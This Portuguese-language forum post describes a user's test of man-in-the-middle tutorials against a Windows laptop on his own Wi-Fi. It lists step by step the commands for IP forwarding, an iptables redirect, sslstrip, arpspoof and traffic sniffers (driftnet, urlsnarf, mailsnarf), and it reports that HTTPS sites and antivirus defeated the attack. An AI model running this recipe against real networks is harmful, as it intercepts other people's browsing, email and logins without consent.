Luciano_chagas
(usa Debian)
Enviado em 09/11/2016 - 18:01h
Resolvi testar algumas "receita de bolo" que tenho visto em sites e no youtube sobre mitm. Todas com eficiência de 100% em ambientes controlados (maquina virtual e etc). Resolvi testar na pratica estes tutoriais e não obtive resultados satisfatórios.
Os testes ocorreram da seguinte maneira:
Notebook atacante com Kali Linux 2.0
Notebook alvo com windows 7 e antivirus avast.
O ambiente foi na minha própria rede wifi.
1° Teste:
SSLstrip e Arpspoof:
Sintaxe:
Terminal 01:
# echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
#sslstrip -a -l 10000
Terminal 02:
#arpspoof -i wlan0 -t ipdoalvo ipdogateway
Terminal 03:
#tail -f sslstrip.log (para ver em tempo real a saida do sslstrip, nada que tivesse nexo)
Terminal 04:
#driftnet -i wlan0 (para visualizar imagens)
Terminal 05:
#urlsnarf -i wlan0 (para visualizar url acessadas)
Terminal 06:
#mailsnarf -i wlan0 (visualizar emails)
Foram acessados através do FIREFOX e GOOGLE CHROME os seguintes sites:
www.g1.com (apareceu as imagens e url)
www.facebook.com (não apareceu nada: imagens,url, login)
www.yahoo.com/mail (nada também)
www.gmail.com (nada também)
youtube.com (nada também)
Somente funcionou para sites comuns ( de noticias, blogs e etc)
Quando o mesmo experimento foi conduzido com sslstrip e ettercap (em substituição ao arpspoof) tanto no modo grafico como no modo texto. O avast bloqueou imediatamente o acesso aos sites pelos referidos navegadores.
Por favor aguardo comentários de pessoas que realmente tenham conhecimento em segurança de redes.